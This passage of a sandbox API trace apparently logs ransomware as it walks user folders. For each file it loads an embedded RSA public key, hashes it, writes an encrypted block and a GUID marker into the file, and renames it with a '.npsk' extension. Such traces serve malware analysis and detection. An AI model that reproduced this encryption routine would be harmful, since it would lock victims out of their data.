(lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.615] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.615] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.616] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.616] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.617] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.617] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.617] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.617] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.617] GetLastError () returned 0x0 [0216.617] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.617] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.617] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.617] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.617] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.617] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.618] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.618] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.618] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.618] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.618] CloseHandle (hObject=0x61c) returned 1 [0216.619] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.npsk")) returned 1 [0216.622] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0216.622] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0216.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.628] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.628] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.630] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.630] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.631] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.631] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.633] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.633] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.633] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.633] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.633] GetLastError () returned 0x0 [0216.633] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.633] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.633] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.633] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.633] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.633] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.634] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.634] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.634] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.634] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.634] CloseHandle (hObject=0x61c) returned 1 [0216.636] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.npsk")) returned 1 [0216.638] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0216.638] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.638] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.638] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0216.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0216.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.638] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.638] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.638] PathFindFileNameW (pszPath="") returned="" [0216.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf370260, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x41352620, ftLastAccessTime.dwHighDateTime=0x1d5dcf8, ftLastWriteTime.dwLowDateTime=0x41352620, ftLastWriteTime.dwHighDateTime=0x1d5dcf8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.639] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf370260, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x41352620, ftLastAccessTime.dwHighDateTime=0x1d5dcf8, ftLastWriteTime.dwLowDateTime=0x41352620, ftLastWriteTime.dwHighDateTime=0x1d5dcf8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.639] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1401e60, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x8fe1e0c0, ftLastAccessTime.dwHighDateTime=0x1d5def0, ftLastWriteTime.dwLowDateTime=0x8fe1e0c0, ftLastWriteTime.dwHighDateTime=0x1d5def0, nFileSizeHigh=0x0, nFileSizeLow=0xded9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kwDz XDuyCjpxO5.wav", cAlternateFileName="KWDZXD~1.WAV")) returned 1 [0216.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\kwDz XDuyCjpxO5.wav") returned=".wav" [0216.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\kwDz XDuyCjpxO5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\kwdz xduycjpxo5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.639] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=57049) returned 1 [0216.639] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.641] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xdeb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.641] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.643] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xded9, lpOverlapped=0x0) returned 1 [0216.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.644] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.645] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.645] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.645] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.645] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.645] GetLastError () returned 0x0 [0216.645] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.645] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.645] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.645] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.645] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.646] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.647] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xded9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.647] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.647] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.647] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.647] CloseHandle (hObject=0x61c) returned 1 [0216.650] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\kwDz XDuyCjpxO5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\kwdz xduycjpxo5.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\kwDz XDuyCjpxO5.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\kwdz xduycjpxo5.wav.npsk")) returned 1 [0216.651] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4ecb10, ftCreationTime.dwHighDateTime=0x1d5dfb4, ftLastAccessTime.dwLowDateTime=0x6449fd0, ftLastAccessTime.dwHighDateTime=0x1d5d91c, ftLastWriteTime.dwLowDateTime=0x6449fd0, ftLastWriteTime.dwHighDateTime=0x1d5d91c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sg3CqdHoD", cAlternateFileName="SG3CQD~1")) returned 1 [0216.652] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4ecb10, ftCreationTime.dwHighDateTime=0x1d5dfb4, ftLastAccessTime.dwLowDateTime=0x6449fd0, ftLastAccessTime.dwHighDateTime=0x1d5d91c, ftLastWriteTime.dwLowDateTime=0x6449fd0, ftLastWriteTime.dwHighDateTime=0x1d5d91c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sg3CqdHoD", cAlternateFileName="SG3CQD~1")) returned 0 [0216.652] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.652] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.652] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.652] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\") returned="S-r24cctxl\\" [0216.652] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0216.652] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.652] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.652] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.652] PathFindFileNameW (pszPath="") returned="" [0216.652] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1460ff0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0xce6c4f80, ftLastAccessTime.dwHighDateTime=0x1d5e083, ftLastWriteTime.dwLowDateTime=0xce6c4f80, ftLastWriteTime.dwHighDateTime=0x1d5e083, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.653] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1460ff0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0xce6c4f80, 